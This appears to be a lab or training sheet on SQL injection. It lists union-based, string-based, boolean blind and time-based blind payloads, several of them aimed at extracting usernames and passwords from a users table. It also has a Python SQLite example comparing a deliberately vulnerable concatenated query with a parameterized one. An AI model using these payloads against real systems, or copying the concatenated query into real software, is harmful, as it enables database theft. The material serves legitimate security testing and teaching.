1. Union-Based SQL Injection
Test union-based SQL injection for data extraction
Example Payloads:
• 1 UNION SELECT 1,2,3,4,5,6
• 1 UNION SELECT null,username,password,email,role,null FROM users
• 1 UNION SELECT 1,database(),user(),version(),5,6
• 1 UNION SELECT 1,table_name,3,4,5,6 FROM information_schema.tables
• -1 UNION SELECT 1,group_concat(username,0x3a,password),3,4,5,6 FROM users
2. String-Based SQL Injection
Test string-based SQL injection in search functionality
Example Payloads:
• admin' OR '1'='1
• ' OR 1=1 --
• ' UNION SELECT 1,2,3,4,5,6 --
• ' UNION SELECT null,username,password,email,role,null FROM users --
• ' AND 1=0 UNION SELECT null,@@version,null,null,null,null --
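Why the string-based payloads above change a concatenated query but not a parameterized one, shown as an added example that is not code from this lab. The in-memory SQLite schema, its constructed rows and the function names are assumptions; the three payloads are taken from the list above.

```python
import sqlite3

def make_db():
    # Constructed sample data. The 6-column products table is an assumption,
    # chosen so the page's 6-column UNION payload lines up with SELECT *.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, description TEXT,
                               price TEXT, category TEXT, stock INTEGER);
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT,
                            email TEXT, role TEXT);
        INSERT INTO products VALUES
            (1, 'widget', 'small widget', '9.99', 'tools', 5),
            (2, 'gadget', 'large gadget', '19.99', 'tools', 2);
        INSERT INTO users VALUES
            (1, 'alice', 'constructed-hash', 'alice@example.test', 'admin');
    """)
    return db

def search_vulnerable(db, term):
    # The term is pasted into the SQL text, so a quote in it ends the string
    # literal and the rest is parsed as SQL.
    sql = "SELECT * FROM products WHERE name = '" + term + "'"
    return db.execute(sql).fetchall()

def search_parameterized(db, term):
    # The term is bound as a value and only ever compared with the name column.
    return db.execute("SELECT * FROM products WHERE name = ?", (term,)).fetchall()

# String-based payloads from the list above.
PAYLOADS = [
    "admin' OR '1'='1",
    "' OR 1=1 --",
    "' UNION SELECT null,username,password,email,role,null FROM users --",
]

def compare(db):
    # For each payload: (payload, rows from concatenated query, rows from bound query)
    return [(p, len(search_vulnerable(db, p)), len(search_parameterized(db, p)))
            for p in PAYLOADS]

if __name__ == "__main__":
    for payload, vuln_rows, safe_rows in compare(make_db()):
        print(f"{payload!r}: concatenated={vuln_rows} rows, parameterized={safe_rows} rows")
```

With the bound parameter each payload is treated as a literal product name that matches nothing, while a legitimate search such as `widget` still returns its row.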
3. Blind SQL Injection
Test boolean-based blind SQL injection
Example Payloads:
• 1 AND 1=1
• 1 AND 1=2
• 1 AND (SELECT COUNT(*) FROM users)>0
• 1 AND (SELECT LENGTH(password) FROM users WHERE id=1)>5
• 1 AND SUBSTRING((SELECT password FROM users WHERE id=1),1,1)='a'
4. Time-Based Blind SQL Injection
Test time-based blind SQL injection
Example Payloads:
• 1 AND SLEEP(5)
• 1 AND IF(1=1,SLEEP(5),0)
• 1 AND IF((SELECT COUNT(*) FROM users)>0,SLEEP(5),0)
• 1 AND IF(SUBSTRING((SELECT password FROM users WHERE id=1),1,1)='a',SLEEP(5),0)
• 1; WAITFOR DELAY '00:00:05' -- (SQL Server)